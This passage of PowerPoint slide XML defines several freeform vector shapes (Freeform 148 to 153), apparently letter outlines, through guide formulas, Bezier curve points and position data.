                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 223"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 11 h 223"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 223"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 223"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 121 h 223"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 223"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 223"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 223"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 223 h 223"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 204 h 223"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 223 h 223"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 223"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="113" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="91"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="85"/>
                    <a:pt x="30" y="79"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="31"/>
                    <a:pt x="94" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="31"/>
                    <a:pt x="142" y="46"/>
                    <a:pt x="144" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="76"/>
                    <a:pt x="160" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="76"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="13"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="114"/>
                    <a:pt x="98" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="125"/>
                    <a:pt x="162" y="131"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="139"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="223"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="222"/>
                    <a:pt x="84" y="223"/>
                    <a:pt x="98" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="223"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="106"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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7" name="Freeform 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8684CC85-C88D-4F6B-AB68-C808627CBC19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId44"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2357437" y="1422400"/>
              <a:ext cx="77788" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 120 w 204"/>
                <a:gd name="T1" fmla="*/ 21 h 305"/>
                <a:gd name="T2" fmla="*/ 100 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 305"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 120 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 120 w 204"/>
                <a:gd name="T29" fmla="*/ 2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305">
                  <a:moveTo>
                    <a:pt x="120" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="5"/>
                    <a:pt x="117" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="2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8" name="Freeform 149">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7DDA4C-BC69-4679-AAA8-59BFB76167BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId45"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2457450" y="1455738"/>
              <a:ext cx="77788" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 203"/>
                <a:gd name="T1" fmla="*/ 125 h 223"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 203"/>
                <a:gd name="T7" fmla="*/ 112 h 223"/>
                <a:gd name="T8" fmla="*/ 114 w 203"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 203 w 203"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 186 w 203"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 203"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 203"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 35 w 203"/>
                <a:gd name="T19" fmla="*/ 125 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 203"/>
                <a:gd name="T21" fmla="*/ 125 h 223"/>
                <a:gd name="T22" fmla="*/ 35 w 203"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 203"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 168 w 203"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 35 w 203"/>
                <a:gd name="T29" fmla="*/ 9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223">
                  <a:moveTo>
                    <a:pt x="184" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="125"/>
                    <a:pt x="203" y="125"/>
                    <a:pt x="203" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="223"/>
                    <a:pt x="114" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="223"/>
                    <a:pt x="203" y="178"/>
                    <a:pt x="203" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="9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59" name="Freeform 150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED61DE0D-1092-447F-9CAA-C9860CFD1598}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId46"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2552700" y="1457325"/>
              <a:ext cx="90488" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 237"/>
                <a:gd name="T1" fmla="*/ 30 h 217"/>
                <a:gd name="T2" fmla="*/ 217 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 217"/>
                <a:gd name="T4" fmla="*/ 237 w 237"/>
                <a:gd name="T5" fmla="*/ 15 h 217"/>
                <a:gd name="T6" fmla="*/ 217 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 159 w 237"/>
                <a:gd name="T9" fmla="*/ 0 h 217"/>
                <a:gd name="T10" fmla="*/ 139 w 237"/>
                <a:gd name="T11" fmla="*/ 15 h 217"/>
                <a:gd name="T12" fmla="*/ 159 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 217"/>
                <a:gd name="T14" fmla="*/ 173 w 237"/>
                <a:gd name="T15" fmla="*/ 30 h 217"/>
                <a:gd name="T16" fmla="*/ 118 w 237"/>
                <a:gd name="T17" fmla="*/ 191 h 217"/>
                <a:gd name="T18" fmla="*/ 64 w 237"/>
                <a:gd name="T19" fmla="*/ 30 h 217"/>
                <a:gd name="T20" fmla="*/ 78 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 217"/>
                <a:gd name="T22" fmla="*/ 98 w 237"/>
                <a:gd name="T23" fmla="*/ 15 h 217"/>
                <a:gd name="T24" fmla="*/ 78 w 237"/>
                <a:gd name="T25" fmla="*/ 0 h 217"/>
                <a:gd name="T26" fmla="*/ 20 w 237"/>
                <a:gd name="T27" fmla="*/ 0 h 217"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 15 h 217"/>
                <a:gd name="T30" fmla="*/ 20 w 237"/>
                <a:gd name="T31" fmla="*/ 30 h 217"/>
                <a:gd name="T32" fmla="*/ 34 w 237"/>
                <a:gd name="T33" fmla="*/ 30 h 217"/>
                <a:gd name="T34" fmla="*/ 92 w 237"/>
                <a:gd name="T35" fmla="*/ 200 h 217"/>
                <a:gd name="T36" fmla="*/ 118 w 237"/>
                <a:gd name="T37" fmla="*/ 217 h 217"/>
                <a:gd name="T38" fmla="*/ 145 w 237"/>
                <a:gd name="T39" fmla="*/ 200 h 217"/>
                <a:gd name="T40" fmla="*/ 202 w 237"/>
                <a:gd name="T41" fmla="*/ 3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7" h="217">
                  <a:moveTo>
                    <a:pt x="202" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="217" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="30"/>
                    <a:pt x="237" y="30"/>
                    <a:pt x="237" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="0"/>
                    <a:pt x="225" y="0"/>
                    <a:pt x="217" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="30"/>
                    <a:pt x="151" y="30"/>
                    <a:pt x="159" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="108" y="217"/>
                    <a:pt x="118" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="217"/>
                    <a:pt x="139" y="217"/>
                    <a:pt x="145" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202"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0" name="Freeform 151">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461F9046-FE29-416F-BEE5-32B367FC7719}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId47"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2659062" y="1455738"/>
              <a:ext cx="79375" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 125 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 112 h 223"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 125 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 125 h 223"/>
                <a:gd name="T22" fmla="*/ 35 w 204"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 168 w 204"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 35 w 204"/>
                <a:gd name="T29" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="184" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="125"/>
                    <a:pt x="204" y="125"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="223"/>
                    <a:pt x="114" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="9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1" name="Freeform 152">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E95382-865E-4EA8-9C3C-EEFE8F6AAE04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId48"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2760662" y="1422400"/>
              <a:ext cx="77788" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 21 h 305"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 20 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 305"/>
                <a:gd name="T10" fmla="*/ 84 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 305"/>
                <a:gd name="T12" fmla="*/ 84 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 21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305">
                  <a:moveTo>
                    <a:pt x="119" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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2" name="Freeform 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA11792-337B-4750-AB6D-92FA57A85454}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId49"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2892425" y="1406525"/>
              <a:ext cx="50800" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 130"/>
                <a:gd name="T1" fmla="*/ 30 h 387"/>
                <a:gd name="T2" fmla="*/ 130 w 130"/>
                <a:gd name="T3" fmla="*/ 15 h 387"/>
                <a:gd name="T4" fmla="*/ 110 w 130"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 20 w 130"/>
                <a:gd name="T7" fmla="*/ 0 h 387"/>
                <a:gd name="T8" fmla="*/ 0 w 130"/>
                <a:gd name="T9" fmla="*/ 20 h 387"/>
                <a:gd name="T10" fmla="*/ 0 w 130"/>
                <a:gd name="T11" fmla="*/ 367 h 387"/>
